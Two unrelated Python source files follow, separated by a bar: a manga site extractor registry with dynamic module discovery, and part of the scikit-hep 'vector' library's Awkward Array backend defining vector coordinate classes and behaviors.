from ..exceptions import MangaDBException
# Directory this package lives in; used to discover extractor modules on disk
module_dir: str = os.path.dirname(os.path.realpath(__file__))
# account for being bundled (e.g. using pyinstaller)
# when trying to find data files relative to the main script, sys._MEIPASS can be used
# if getattr(sys, 'frozen', False): # check if we're bundled
# bundle_dir = os.path.abspath(sys._MEIPASS)
# module_dir = os.path.join(bundle_dir, os.path.dirname(__file__))
# the above does not work since python modules are embedded in the exe as a
# compressed ZlibArchive instead of being saved in a normal folder structure
# custom import hooks make sure that normal imports work
# but since we try to import files based on a folders content it won't work
# since __file__ just points to the location at the time of import and
# not to the location in the exe (since that's not possible with a path anyway)
# => either import them by a list of static names or store them
# as data files in the pyinstaller output
# get all modules in dir (except __init__.py) and remove ending
# also possible to specify all names
# don't include base module since empty pattern "" of BaseExtractor matches on everything
modules: List[str] = [f[:-3] for f in os.listdir(module_dir) if not f.startswith("__") and
                      f != 'base.py' and f.endswith('.py')]
# holds extractor classes already imported extractor modules
_cache: List[Type[BaseMangaExtractor]] = []
# these should never be changed, only new ones can be added!
# bidirectional mapping: int id -> site name AND site name -> int id
SUPPORTED_SITES: Dict[Union[int, str], Union[int, str]] = {
        # site id, site name
        1: "tsumino.com",
        2: "nhentai.net",
        3: "MangaDex",
        4: "Manganelo",
        5: "Toonily",
        6: "MangaSee123",
        7: "MANUAL_ADD",
        # site name, id
        "tsumino.com": 1,
        "nhentai.net": 2,
        "MangaDex": 3,
        "Manganelo": 4,
        "Toonily": 5,
        "MangaSee123": 6,
        "MANUAL_ADD": 7,
}
# Sentinel site id for books entered by hand (no extractor module exists)
MANUAL_ADD = SUPPORTED_SITES["MANUAL_ADD"]
class ManualAddDummyExtractor(BaseMangaExtractor):
    """Placeholder extractor returned for manually added books (no real site)."""
    # casts narrow the Union[int, str] values from SUPPORTED_SITES for mypy
    site_id = cast(int, MANUAL_ADD)
    site_name = cast(str, "MANUAL_ADD")
def find(url: str) -> Type[BaseMangaExtractor]:
    """Return the first registered extractor class whose pattern matches ``url``.

    :raises NoExtractorFound: if no extractor matches the URL.
    """
    matched = next(
        (extr for extr in _list_extractor_classes() if extr.match(url)), None)
    if matched is None:
        raise NoExtractorFound(f"No matching extractor found for '{url}'")
    return matched
def find_by_site_id(site_id: int) -> Type[BaseMangaExtractor]:
    """Find extractor for given site_id.

    Falls back to ManualAddDummyExtractor for manually added books.
    :raises NoExtractorFound: if no extractor is registered for ``site_id``.
    """
    for cls in _list_extractor_classes():
        if cls.site_id == site_id:
            return cls
    # Fix: compare against the named MANUAL_ADD constant instead of the magic
    # number 7, so SUPPORTED_SITES stays the single source of truth
    if site_id == MANUAL_ADD:
        return ManualAddDummyExtractor
    raise NoExtractorFound(f"No matching extractor found for site_id '{site_id}'")
def add_extractor_cls_module(module):
    """Register extractor classes of an externally supplied module (unimplemented stub).

    # needed if a class can have more than one pattern
    # then add (pattern, class) tuples for all cls in _get_classes_in_module
    """
    pass
def _list_extractor_classes() -> Iterator[Type[BaseMangaExtractor]]:
    """
    Yields
    firstly: Extractor classes from _cache (since their modules were already imported)
    secondly: Extractor classes found in the extractor modules that are not
              cached yet; these are appended to _cache as they are discovered

    Fix: previously every call re-imported the modules and unconditionally
    extended _cache, so each call after the first yielded (and cached)
    duplicates of every extractor class.
    """
    yield from _cache
    for mod_name in modules:
        # using relative import with "." package=base of rel import;
        # importlib caches modules, so repeated imports are cheap no-ops
        extr_classes = _get_classes_in_module(importlib.import_module(
            "."+mod_name, package=__package__))
        # only cache and yield classes not seen before
        new_classes = [cls for cls in extr_classes if cls not in _cache]
        _cache.extend(new_classes)
        yield from new_classes
def _get_classes_in_module(module) -> List[Type[BaseMangaExtractor]]:
    """Return all BaseMangaExtractor subclasses defined in ``module``.

    inspect.getmembers(module, inspect.isclass) also reports classes that were
    merely imported into the module, so each candidate's __module__ is checked
    against module.__name__ to keep only classes actually defined there.
    """
    found = []
    for _name, member in inspect.getmembers(module, inspect.isclass):
        if issubclass(member, BaseMangaExtractor) and member.__module__ == module.__name__:
            found.append(member)
    return found
class NoExtractorFound(MangaDBException):
    """Raised when no extractor matches a given URL or site id."""
    def __init__(self, msg):
        # Call the base class constructor with the parameters it needs
        super().__init__(msg)
|
# Copyright (c) 2019-2021, <NAME>, <NAME>, <NAME>, and <NAME>.
#
# Distributed under the 3-clause BSD license, see accompanying file LICENSE
# or https://github.com/scikit-hep/vector for details.
"""
Defines behaviors for Awkward Array. New arrays created with the
.. code-block:: python
vector.Array(...)
function will have these behaviors built in (and will pass them to any derived
arrays).
Alternatively, you can
.. code-block:: python
vector.register_awkward()
to install the behaviors globally, so that any record named ``Vector2D``,
``Vector3D``, ``Vector4D``, ``Momentum2D``, ``Momentum3D``, or ``Momentum4D``
will have these properties and methods.
The Awkward-Vectors-in-Numba extension is also implemented here, since it requires
two non-strict dependencies of Vector: Awkward and Numba. Awkward's ``ak.behavior``
manages this non-strictness well.
"""
import numbers
import types
import typing
import awkward as ak
import numpy
import vector
from vector._backends.numpy_ import VectorNumpy2D, VectorNumpy3D, VectorNumpy4D
from vector._backends.object_ import (
AzimuthalObjectRhoPhi,
AzimuthalObjectXY,
LongitudinalObjectEta,
LongitudinalObjectTheta,
LongitudinalObjectZ,
TemporalObjectT,
TemporalObjectTau,
VectorObject2D,
VectorObject3D,
VectorObject4D,
)
from vector._methods import (
Azimuthal,
AzimuthalRhoPhi,
AzimuthalXY,
Longitudinal,
LongitudinalEta,
LongitudinalTheta,
LongitudinalZ,
Lorentz,
LorentzMomentum,
Momentum,
Planar,
PlanarMomentum,
Spatial,
SpatialMomentum,
Temporal,
TemporalT,
TemporalTau,
Vector2D,
Vector3D,
Vector4D,
VectorProtocol,
)
from vector._typeutils import BoolCollection, ScalarCollection
# Throws an error if awkward is too old
vector._import_awkward()
# Type var for methods that work on either whole arrays or single records
ArrayOrRecord = typing.TypeVar("ArrayOrRecord", bound=typing.Union[ak.Array, ak.Record])
# Registry of Awkward behaviors populated throughout this module
behavior: typing.Any = {}
# coordinates classes are a formality for Awkward #############################
class CoordinatesAwkward:
    """Base class marking Awkward-backed coordinates; computations use numpy."""
    lib: types.ModuleType = numpy
class AzimuthalAwkward(CoordinatesAwkward, Azimuthal):
    """Azimuthal (transverse-plane) coordinates backed by Awkward arrays."""
    @classmethod
    def from_fields(cls, array: ak.Array) -> "AzimuthalAwkward":
        """
        Create a :doc:`vector._backends.awkward_.AzimuthalAwkwardXY` or a
        :doc:`vector._backends.awkward_.AzimuthalAwkwardRhoPhi`, depending on
        the fields in ``array``.

        Raises ValueError if neither (x, y) nor (rho, phi) is present.
        """
        fields = ak.fields(array)
        if "x" in fields and "y" in fields:
            return AzimuthalAwkwardXY(array["x"], array["y"])
        elif "rho" in fields and "phi" in fields:
            return AzimuthalAwkwardRhoPhi(array["rho"], array["phi"])
        else:
            raise ValueError(
                "array does not have azimuthal coordinates (x, y or rho, phi): "
                f"{', '.join(fields)}"
            )
    @classmethod
    def from_momentum_fields(cls, array: ak.Array) -> "AzimuthalAwkward":
        """
        Create a :doc:`vector._backends.awkward_.AzimuthalAwkwardXY` or a
        :doc:`vector._backends.awkward_.AzimuthalAwkwardRhoPhi`, depending on
        the fields in ``array``, allowing momentum synonyms (px/py, pt).
        """
        fields = ak.fields(array)
        # every combination of plain and momentum-style field names is accepted
        if "x" in fields and "y" in fields:
            return AzimuthalAwkwardXY(array["x"], array["y"])
        elif "x" in fields and "py" in fields:
            return AzimuthalAwkwardXY(array["x"], array["py"])
        elif "px" in fields and "y" in fields:
            return AzimuthalAwkwardXY(array["px"], array["y"])
        elif "px" in fields and "py" in fields:
            return AzimuthalAwkwardXY(array["px"], array["py"])
        elif "rho" in fields and "phi" in fields:
            return AzimuthalAwkwardRhoPhi(array["rho"], array["phi"])
        elif "pt" in fields and "phi" in fields:
            return AzimuthalAwkwardRhoPhi(array["pt"], array["phi"])
        else:
            raise ValueError(
                "array does not have azimuthal coordinates (x/px, y/py or rho/pt, phi): "
                f"{', '.join(fields)}"
            )
class LongitudinalAwkward(CoordinatesAwkward, Longitudinal):
    """Longitudinal (beam-axis) coordinates backed by Awkward arrays."""
    @classmethod
    def from_fields(cls, array: ak.Array) -> "LongitudinalAwkward":
        """
        Create a :doc:`vector._backends.awkward_.LongitudinalAwkwardZ`, a
        :doc:`vector._backends.awkward_.LongitudinalAwkwardTheta`, or a
        :doc:`vector._backends.awkward_.LongitudinalAwkwardEta`, depending on
        the fields in ``array``.

        Raises ValueError if none of z, theta, eta is present.
        """
        fields = ak.fields(array)
        if "z" in fields:
            return LongitudinalAwkwardZ(array["z"])
        elif "theta" in fields:
            return LongitudinalAwkwardTheta(array["theta"])
        elif "eta" in fields:
            return LongitudinalAwkwardEta(array["eta"])
        else:
            raise ValueError(
                "array does not have longitudinal coordinates (z or theta or eta): "
                f"{', '.join(fields)}"
            )
    @classmethod
    def from_momentum_fields(cls, array: ak.Array) -> "LongitudinalAwkward":
        """
        Create a :doc:`vector._backends.awkward_.LongitudinalAwkwardZ`, a
        :doc:`vector._backends.awkward_.LongitudinalAwkwardTheta`, or a
        :doc:`vector._backends.awkward_.LongitudinalAwkwardEta`, depending on
        the fields in ``array``, allowing momentum synonyms (pz).
        """
        fields = ak.fields(array)
        if "z" in fields:
            return LongitudinalAwkwardZ(array["z"])
        elif "pz" in fields:
            return LongitudinalAwkwardZ(array["pz"])
        elif "theta" in fields:
            return LongitudinalAwkwardTheta(array["theta"])
        elif "eta" in fields:
            return LongitudinalAwkwardEta(array["eta"])
        else:
            raise ValueError(
                "array does not have longitudinal coordinates (z/pz or theta or eta): "
                f"{', '.join(fields)}"
            )
class TemporalAwkward(CoordinatesAwkward, Temporal):
    """Temporal (time/energy or proper-time/mass) coordinates backed by Awkward arrays."""
    @classmethod
    def from_fields(cls, array: ak.Array) -> "TemporalAwkward":
        """
        Create a :doc:`vector._backends.awkward_.TemporalT` or a
        :doc:`vector._backends.awkward_.TemporalTau`, depending on
        the fields in ``array``.

        Raises ValueError if neither t nor tau is present.
        """
        fields = ak.fields(array)
        if "t" in fields:
            return TemporalAwkwardT(array["t"])
        elif "tau" in fields:
            return TemporalAwkwardTau(array["tau"])
        else:
            raise ValueError(
                "array does not have temporal coordinates (t or tau): "
                f"{', '.join(fields)}"
            )
    @classmethod
    def from_momentum_fields(cls, array: ak.Array) -> "TemporalAwkward":
        """
        Create a :doc:`vector._backends.awkward_.TemporalT` or a
        :doc:`vector._backends.awkward_.TemporalTau`, depending on
        the fields in ``array``, allowing momentum synonyms
        (E/e/energy for t; M/m/mass for tau).
        """
        fields = ak.fields(array)
        if "t" in fields:
            return TemporalAwkwardT(array["t"])
        elif "E" in fields:
            return TemporalAwkwardT(array["E"])
        elif "e" in fields:
            return TemporalAwkwardT(array["e"])
        elif "energy" in fields:
            return TemporalAwkwardT(array["energy"])
        elif "tau" in fields:
            return TemporalAwkwardTau(array["tau"])
        elif "M" in fields:
            return TemporalAwkwardTau(array["M"])
        elif "m" in fields:
            return TemporalAwkwardTau(array["m"])
        elif "mass" in fields:
            return TemporalAwkwardTau(array["mass"])
        else:
            raise ValueError(
                "array does not have temporal coordinates (t/E/e/energy or tau/M/m/mass): "
                f"{', '.join(fields)}"
            )
class AzimuthalAwkwardXY(AzimuthalAwkward, AzimuthalXY):
    """Cartesian azimuthal coordinates (x, y) holding Awkward arrays."""
    __slots__ = ("x", "y")
    def __init__(self, x: typing.Any, y: typing.Any) -> None:
        self.x = x
        self.y = y
    @property
    def elements(self) -> typing.Tuple[ArrayOrRecord, ArrayOrRecord]:
        # coordinate components in canonical (x, y) order
        return (self.x, self.y)
class AzimuthalAwkwardRhoPhi(AzimuthalAwkward, AzimuthalRhoPhi):
    """Polar azimuthal coordinates (rho, phi) holding Awkward arrays."""
    __slots__ = ("rho", "phi")
    def __init__(self, rho: typing.Any, phi: typing.Any) -> None:
        self.rho = rho
        self.phi = phi
    @property
    def elements(self) -> typing.Tuple[ArrayOrRecord, ArrayOrRecord]:
        # coordinate components in canonical (rho, phi) order
        return (self.rho, self.phi)
class LongitudinalAwkwardZ(LongitudinalAwkward, LongitudinalZ):
    """Longitudinal coordinate z holding an Awkward array."""
    __slots__ = ("z",)
    def __init__(self, z: typing.Any) -> None:
        self.z = z
    @property
    def elements(self) -> typing.Tuple[ArrayOrRecord]:
        return (self.z,)
class LongitudinalAwkwardTheta(LongitudinalAwkward, LongitudinalTheta):
    """Longitudinal coordinate theta holding an Awkward array."""
    __slots__ = ("theta",)
    def __init__(self, theta: typing.Any) -> None:
        self.theta = theta
    @property
    def elements(self) -> typing.Tuple[ArrayOrRecord]:
        return (self.theta,)
class LongitudinalAwkwardEta(LongitudinalAwkward, LongitudinalEta):
    """Longitudinal coordinate eta holding an Awkward array."""
    __slots__ = ("eta",)
    def __init__(self, eta: typing.Any) -> None:
        self.eta = eta
    @property
    def elements(self) -> typing.Tuple[ArrayOrRecord]:
        return (self.eta,)
class TemporalAwkwardT(TemporalAwkward, TemporalT):
    """Temporal coordinate t holding an Awkward array."""
    __slots__ = ("t",)
    def __init__(self, t: typing.Any) -> None:
        self.t = t
    @property
    def elements(self) -> typing.Tuple[ArrayOrRecord]:
        return (self.t,)
class TemporalAwkwardTau(TemporalAwkward, TemporalTau):
    """Temporal coordinate tau holding an Awkward array."""
    __slots__ = ("tau",)
    def __init__(self, tau: typing.Any) -> None:
        self.tau = tau
    @property
    def elements(self) -> typing.Tuple[ArrayOrRecord]:
        return (self.tau,)
def _class_to_name(cls: typing.Type[VectorProtocol]) -> str:
    """Map a vector class to the Awkward record name it should carry.

    The name combines the flavor ("Momentum" vs "Vector") with the
    dimensionality ("2D"/"3D"/"4D"); raises AssertionError for anything else.
    """
    flavor = "Momentum" if issubclass(cls, Momentum) else "Vector"
    for base, dimension in ((Vector2D, "2D"), (Vector3D, "3D"), (Vector4D, "4D")):
        if issubclass(cls, base):
            return flavor + dimension
    raise AssertionError(repr(cls))
# the vector class ############################################################
def _yes_record(x: ak.Array) -> typing.Optional[typing.Union[float, ak.Record]]:
    # unwrap the length-1 array built for record/scalar inputs back to one element
    return x[0]
def _no_record(x: ak.Array) -> typing.Optional[ak.Array]:
    # identity: array results are returned unchanged
    return x
class VectorAwkward:
    """Mixin providing the Awkward-Array backend for vector compute functions."""
    # compute functions dispatch their numerical operations through this module
    lib: types.ModuleType = numpy
    def __getitem__(
        self, where: typing.Any
    ) -> typing.Optional[typing.Union[float, ak.Array, ak.Record]]:
        # delegate to the underlying ak.Array / ak.Record indexing
        return super().__getitem__(where)  # type: ignore
    def _wrap_result(
        self,
        cls: typing.Any,
        result: typing.Any,
        returns: typing.Any,
        num_vecargs: typing.Any,
    ) -> typing.Any:
        """
        Args:
            result: Value or tuple of values from a compute function.
            returns: Signature from a ``dispatch_map``.
            num_vecargs (int): Number of vector arguments in the function
                that would be treated on an equal footing (i.e. ``add``
                has two, but ``rotate_axis`` has only one: the ``axis``
                is secondary).
        Wraps the raw result of a compute function as an array of scalars or an
        array of vectors. Each branch below handles one ``returns`` signature:
        scalar, azimuthal-only, azimuthal+drop, azimuthal+longitudinal,
        azimuthal+longitudinal+drop, or azimuthal+longitudinal+temporal.
        """
        # scalar (float/bool) results pass through untouched
        if returns == [float] or returns == [bool]:
            return result
        if all(not isinstance(x, ak.Array) for x in result):
            # purely scalar/record inputs: wrap each into a length-1 array so
            # ak.zip can combine them, and remember to unwrap at the end
            maybe_record = _yes_record
            result = [
                ak.Array(x.layout.array[x.layout.at : x.layout.at + 1])
                if isinstance(x, ak.Record)
                else ak.Array([x])
                for x in result
            ]
        else:
            maybe_record = _no_record
        # returns == [Azimuthal]: 2D coordinates; output dimension follows self
        if (
            len(returns) == 1
            and isinstance(returns[0], type)
            and issubclass(returns[0], Azimuthal)
        ):
            # broadcast scalar components against the first true array
            first = [x for x in result if isinstance(x, ak.Array)][0]
            result = [
                x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
                for x in result
            ]
            names = []
            arrays = []
            if returns[0] is AzimuthalXY:
                names.extend(["x", "y"])
                arrays.extend([result[0], result[1]])
            elif returns[0] is AzimuthalRhoPhi:
                names.extend(["rho", "phi"])
                arrays.extend([result[0], result[1]])
            fields = ak.fields(self)
            if num_vecargs == 1:
                # single-vector ops keep every non-azimuthal field of self
                for name in fields:
                    if name not in ("x", "y", "rho", "phi"):
                        names.append(name)
                        arrays.append(self[name])
            # output dimensionality mirrors whatever coordinates self carries
            if "t" in fields or "tau" in fields:
                cls = cls.ProjectionClass4D
            elif "z" in fields or "theta" in fields or "eta" in fields:
                cls = cls.ProjectionClass3D
            else:
                cls = cls.ProjectionClass2D
            return maybe_record(
                ak.zip(
                    dict(zip(names, arrays)),
                    depth_limit=first.layout.purelist_depth,
                    with_name=_class_to_name(cls),
                    behavior=None if vector._awkward_registered else first.behavior,
                )
            )
        # returns == [Azimuthal, None]: longitudinal is dropped; always 2D output
        elif (
            len(returns) == 2
            and isinstance(returns[0], type)
            and issubclass(returns[0], Azimuthal)
            and returns[1] is None
        ):
            first = [x for x in result if isinstance(x, ak.Array)][0]
            result = [
                x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
                for x in result
            ]
            names = []
            arrays = []
            if returns[0] is AzimuthalXY:
                names.extend(["x", "y"])
                arrays.extend([result[0], result[1]])
            elif returns[0] is AzimuthalRhoPhi:
                names.extend(["rho", "phi"])
                arrays.extend([result[0], result[1]])
            if num_vecargs == 1:
                # keep only fields that are not coordinates of any kind
                for name in ak.fields(self):
                    if name not in (
                        "x",
                        "y",
                        "rho",
                        "phi",
                        "z",
                        "theta",
                        "eta",
                        "t",
                        "tau",
                    ):
                        names.append(name)
                        arrays.append(self[name])
            return maybe_record(
                ak.zip(
                    dict(zip(names, arrays)),
                    depth_limit=first.layout.purelist_depth,
                    with_name=_class_to_name(cls.ProjectionClass2D),
                    behavior=None if vector._awkward_registered else first.behavior,
                )
            )
        # returns == [Azimuthal, Longitudinal]: 3D, or 4D if self has time
        elif (
            len(returns) == 2
            and isinstance(returns[0], type)
            and issubclass(returns[0], Azimuthal)
            and isinstance(returns[1], type)
            and issubclass(returns[1], Longitudinal)
        ):
            first = [x for x in result if isinstance(x, ak.Array)][0]
            result = [
                x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
                for x in result
            ]
            names = []
            arrays = []
            if returns[0] is AzimuthalXY:
                names.extend(["x", "y"])
                arrays.extend([result[0], result[1]])
            elif returns[0] is AzimuthalRhoPhi:
                names.extend(["rho", "phi"])
                arrays.extend([result[0], result[1]])
            if returns[1] is LongitudinalZ:
                names.append("z")
                arrays.append(result[2])
            elif returns[1] is LongitudinalTheta:
                names.append("theta")
                arrays.append(result[2])
            elif returns[1] is LongitudinalEta:
                names.append("eta")
                arrays.append(result[2])
            fields = ak.fields(self)
            if num_vecargs == 1:
                for name in fields:
                    if name not in ("x", "y", "rho", "phi", "z", "theta", "eta"):
                        names.append(name)
                        arrays.append(self[name])
            if "t" in fields or "tau" in fields:
                cls = cls.ProjectionClass4D
            else:
                cls = cls.ProjectionClass3D
            return maybe_record(
                ak.zip(
                    dict(zip(names, arrays)),
                    depth_limit=first.layout.purelist_depth,
                    with_name=_class_to_name(cls),
                    behavior=None if vector._awkward_registered else first.behavior,
                )
            )
        # returns == [Azimuthal, Longitudinal, None]: temporal dropped; 3D output
        elif (
            len(returns) == 3
            and isinstance(returns[0], type)
            and issubclass(returns[0], Azimuthal)
            and isinstance(returns[1], type)
            and issubclass(returns[1], Longitudinal)
            and returns[2] is None
        ):
            first = [x for x in result if isinstance(x, ak.Array)][0]
            result = [
                x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
                for x in result
            ]
            names = []
            arrays = []
            if returns[0] is AzimuthalXY:
                names.extend(["x", "y"])
                arrays.extend([result[0], result[1]])
            elif returns[0] is AzimuthalRhoPhi:
                names.extend(["rho", "phi"])
                arrays.extend([result[0], result[1]])
            if returns[1] is LongitudinalZ:
                names.append("z")
                arrays.append(result[2])
            elif returns[1] is LongitudinalTheta:
                names.append("theta")
                arrays.append(result[2])
            elif returns[1] is LongitudinalEta:
                names.append("eta")
                arrays.append(result[2])
            if num_vecargs == 1:
                for name in ak.fields(self):
                    if name not in (
                        "x",
                        "y",
                        "rho",
                        "phi",
                        "z",
                        "theta",
                        "eta",
                        "t",
                        "tau",
                    ):
                        names.append(name)
                        arrays.append(self[name])
            return maybe_record(
                ak.zip(
                    dict(zip(names, arrays)),
                    depth_limit=first.layout.purelist_depth,
                    with_name=_class_to_name(cls.ProjectionClass3D),
                    behavior=None if vector._awkward_registered else first.behavior,
                )
            )
        # returns == [Azimuthal, Longitudinal, Temporal]: full 4D output
        elif (
            len(returns) == 3
            and isinstance(returns[0], type)
            and issubclass(returns[0], Azimuthal)
            and isinstance(returns[1], type)
            and issubclass(returns[1], Longitudinal)
            and isinstance(returns[2], type)
            and issubclass(returns[2], Temporal)
        ):
            first = [x for x in result if isinstance(x, ak.Array)][0]
            result = [
                x if isinstance(x, ak.Array) else ak.broadcast_arrays(first, x)[1]
                for x in result
            ]
            names = []
            arrays = []
            if returns[0] is AzimuthalXY:
                names.extend(["x", "y"])
                arrays.extend([result[0], result[1]])
            elif returns[0] is AzimuthalRhoPhi:
                names.extend(["rho", "phi"])
                arrays.extend([result[0], result[1]])
            if returns[1] is LongitudinalZ:
                names.append("z")
                arrays.append(result[2])
            elif returns[1] is LongitudinalTheta:
                names.append("theta")
                arrays.append(result[2])
            elif returns[1] is LongitudinalEta:
                names.append("eta")
                arrays.append(result[2])
            if returns[2] is TemporalT:
                names.append("t")
                arrays.append(result[3])
            elif returns[2] is TemporalTau:
                names.append("tau")
                arrays.append(result[3])
            if num_vecargs == 1:
                for name in ak.fields(self):
                    if name not in (
                        "x",
                        "y",
                        "rho",
                        "phi",
                        "z",
                        "theta",
                        "eta",
                        "t",
                        "tau",
                    ):
                        names.append(name)
                        arrays.append(self[name])
            return maybe_record(
                ak.zip(
                    dict(zip(names, arrays)),
                    depth_limit=first.layout.purelist_depth,
                    with_name=_class_to_name(cls.ProjectionClass4D),
                    behavior=None if vector._awkward_registered else first.behavior,
                )
            )
        else:
            # unknown signature: a bug in the dispatch_map, not user error
            raise AssertionError(repr(returns))
class VectorAwkward2D(VectorAwkward, Planar, Vector2D):
    """2D vector backed by Awkward arrays with plain coordinate names."""
    @property
    def azimuthal(self) -> AzimuthalAwkward:
        return AzimuthalAwkward.from_fields(self)
class MomentumAwkward2D(PlanarMomentum, VectorAwkward2D):
    """2D momentum vector; accepts momentum synonyms (px/py, pt) as fields."""
    @property
    def azimuthal(self) -> AzimuthalAwkward:
        return AzimuthalAwkward.from_momentum_fields(self)
class VectorAwkward3D(VectorAwkward, Spatial, Vector3D):
    # Awkward-backend 3D vector mixin: azimuthal + longitudinal views from
    # the record's generic field names.
    @property
    def azimuthal(self) -> AzimuthalAwkward:
        """Azimuthal coordinate pair read from this array's generic fields."""
        return AzimuthalAwkward.from_fields(self)
    @property
    def longitudinal(self) -> LongitudinalAwkward:
        """Longitudinal coordinate read from this array's generic fields."""
        return LongitudinalAwkward.from_fields(self)
class MomentumAwkward3D(SpatialMomentum, VectorAwkward3D):
    # Momentum flavor of the 3D mixin: both views use momentum-style readers.
    @property
    def azimuthal(self) -> AzimuthalAwkward:
        """Azimuthal coordinate pair read via momentum-style field names."""
        return AzimuthalAwkward.from_momentum_fields(self)
    @property
    def longitudinal(self) -> LongitudinalAwkward:
        """Longitudinal coordinate read via momentum-style field names."""
        return LongitudinalAwkward.from_momentum_fields(self)
class VectorAwkward4D(VectorAwkward, Lorentz, Vector4D):
    # Awkward-backend 4D (Lorentz) vector mixin: azimuthal + longitudinal +
    # temporal views from the record's generic field names.
    @property
    def azimuthal(self) -> AzimuthalAwkward:
        """Azimuthal coordinate pair read from this array's generic fields."""
        return AzimuthalAwkward.from_fields(self)
    @property
    def longitudinal(self) -> LongitudinalAwkward:
        """Longitudinal coordinate read from this array's generic fields."""
        return LongitudinalAwkward.from_fields(self)
    @property
    def temporal(self) -> TemporalAwkward:
        """Temporal coordinate read from this array's generic fields."""
        return TemporalAwkward.from_fields(self)
class MomentumAwkward4D(LorentzMomentum, VectorAwkward4D):
    # Momentum flavor of the 4D mixin: all three views use momentum-style readers.
    @property
    def azimuthal(self) -> AzimuthalAwkward:
        """Azimuthal coordinate pair read via momentum-style field names."""
        return AzimuthalAwkward.from_momentum_fields(self)
    @property
    def longitudinal(self) -> LongitudinalAwkward:
        """Longitudinal coordinate read via momentum-style field names."""
        return LongitudinalAwkward.from_momentum_fields(self)
    @property
    def temporal(self) -> TemporalAwkward:
        """Temporal coordinate read via momentum-style field names."""
        return TemporalAwkward.from_momentum_fields(self)
# ak.Array and ak.Record subclasses ###########################################
class VectorArray2D(VectorAwkward2D, ak.Array):
    # Array-of-records flavor: vector methods from VectorAwkward2D, array
    # semantics from ak.Array.
    def allclose(
        self,
        other: VectorProtocol,
        rtol: ScalarCollection = 1e-05,
        atol: ScalarCollection = 1e-08,
        equal_nan: BoolCollection = False,
    ) -> BoolCollection:
        """
        Like ``np.ndarray.allclose``, but for VectorArray2D: reduces the
        elementwise ``isclose`` result with ``ak.all``.
        """
        return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
# "*" registers the array class for any list depth over "Vector2D" records.
behavior["*", "Vector2D"] = VectorArray2D
class VectorRecord2D(VectorAwkward2D, ak.Record):
    # Scalar (single-record) flavor of the 2D vector.
    pass
behavior["Vector2D"] = VectorRecord2D
class VectorArray3D(VectorAwkward3D, ak.Array):
    # Array-of-records flavor of the 3D vector.
    def allclose(
        self,
        other: VectorProtocol,
        rtol: ScalarCollection = 1e-05,
        atol: ScalarCollection = 1e-08,
        equal_nan: BoolCollection = False,
    ) -> BoolCollection:
        """
        Like ``np.ndarray.allclose``, but for VectorArray3D: reduces the
        elementwise ``isclose`` result with ``ak.all``.
        """
        return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
# "*" registers the array class for any list depth over "Vector3D" records.
behavior["*", "Vector3D"] = VectorArray3D
class VectorRecord3D(VectorAwkward3D, ak.Record):
    # Scalar (single-record) flavor of the 3D vector.
    pass
behavior["Vector3D"] = VectorRecord3D
class VectorArray4D(VectorAwkward4D, ak.Array):
    # Array-of-records flavor of the 4D (Lorentz) vector.
    def allclose(
        self,
        other: VectorProtocol,
        rtol: ScalarCollection = 1e-05,
        atol: ScalarCollection = 1e-08,
        equal_nan: BoolCollection = False,
    ) -> BoolCollection:
        """
        Like ``np.ndarray.allclose``, but for VectorArray4D: reduces the
        elementwise ``isclose`` result with ``ak.all``.
        """
        return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
# "*" registers the array class for any list depth over "Vector4D" records.
behavior["*", "Vector4D"] = VectorArray4D
class VectorRecord4D(VectorAwkward4D, ak.Record):
    # Scalar (single-record) flavor of the 4D vector.
    pass
behavior["Vector4D"] = VectorRecord4D
class MomentumArray2D(MomentumAwkward2D, ak.Array):
    # Array-of-records flavor of the 2D momentum vector.
    def allclose(
        self,
        other: VectorProtocol,
        rtol: ScalarCollection = 1e-05,
        atol: ScalarCollection = 1e-08,
        equal_nan: BoolCollection = False,
    ) -> BoolCollection:
        """Like ``np.ndarray.allclose``, but for MomentumArray2D."""
        return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
# "*" registers the array class for any list depth over "Momentum2D" records.
behavior["*", "Momentum2D"] = MomentumArray2D
class MomentumRecord2D(MomentumAwkward2D, ak.Record):
    # Scalar (single-record) flavor of the 2D momentum vector.
    pass
behavior["Momentum2D"] = MomentumRecord2D
class MomentumArray3D(MomentumAwkward3D, ak.Array):
    # Array-of-records flavor of the 3D momentum vector.
    def allclose(
        self,
        other: VectorProtocol,
        rtol: ScalarCollection = 1e-05,
        atol: ScalarCollection = 1e-08,
        equal_nan: BoolCollection = False,
    ) -> BoolCollection:
        """Like ``np.ndarray.allclose``, but for MomentumArray3D."""
        return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
# "*" registers the array class for any list depth over "Momentum3D" records.
behavior["*", "Momentum3D"] = MomentumArray3D
class MomentumRecord3D(MomentumAwkward3D, ak.Record):
    # Scalar (single-record) flavor of the 3D momentum vector.
    pass
behavior["Momentum3D"] = MomentumRecord3D
class MomentumArray4D(MomentumAwkward4D, ak.Array):
    # Array-of-records flavor of the 4D momentum (Lorentz) vector.
    def allclose(
        self,
        other: VectorProtocol,
        rtol: ScalarCollection = 1e-05,
        atol: ScalarCollection = 1e-08,
        equal_nan: BoolCollection = False,
    ) -> BoolCollection:
        """Like ``np.ndarray.allclose``, but for MomentumArray4D."""
        return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
# "*" registers the array class for any list depth over "Momentum4D" records.
behavior["*", "Momentum4D"] = MomentumArray4D
class MomentumRecord4D(MomentumAwkward4D, ak.Record):
    # Scalar (single-record) flavor of the 4D momentum vector.
    pass
behavior["Momentum4D"] = MomentumRecord4D
# NumPy functions, which also affect operator overloading #####################
# numpy.absolute -> the vector's magnitude: rho (2D), mag (3D), tau (4D).
behavior[numpy.absolute, "Vector2D"] = lambda v: v.rho
behavior[numpy.absolute, "Vector3D"] = lambda v: v.mag
behavior[numpy.absolute, "Vector4D"] = lambda v: v.tau
behavior[numpy.absolute, "Momentum2D"] = lambda v: v.rho
behavior[numpy.absolute, "Momentum3D"] = lambda v: v.mag
behavior[numpy.absolute, "Momentum4D"] = lambda v: v.tau
# numpy.square -> squared magnitude, read off the dedicated *2 property.
behavior[numpy.square, "Vector2D"] = lambda v: v.rho2
